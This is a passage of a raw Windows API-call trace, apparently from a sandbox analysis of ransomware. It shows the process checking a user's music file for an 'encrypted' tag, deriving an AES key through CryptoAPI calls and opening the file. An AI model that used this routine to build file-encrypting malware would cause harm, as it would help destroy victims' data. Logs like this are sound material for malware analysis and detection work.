returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.005] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.005] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.005] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.005] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.005] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.005] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.005] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.005] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.005] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcff3990, ftCreationTime.dwHighDateTime=0x1d5b921, ftLastAccessTime.dwLowDateTime=0x3058f6a0, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x3058f6a0, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c1a, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="GR_-.m4a", cAlternateFileName="")) returned 0x7c2100 [0039.005] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.005] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.006] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.006] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.006] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.006] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.006] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.006] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.006] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.006] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.006] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.006] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.006] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.006] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.006] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.006] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0039.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.006] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0039.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.007] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.008] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.008] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.008] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.008] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.008] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.008] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.008] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.008] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.008] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.008] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.008] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.008] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.009] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.009] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.009] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.009] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.009] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.009] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.009] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.010] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.010] CryptHashData (hHash=0x7c2240, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.010] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.010] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.010] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.010] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0039.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.010] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0039.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.011] CryptDestroyHash (hHash=0x7c2240) returned 1 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.011] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0039.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\gr_-.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.012] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.012] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.012] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.012] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.012] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.013] HeapFree (in: hHeap=0x770000, 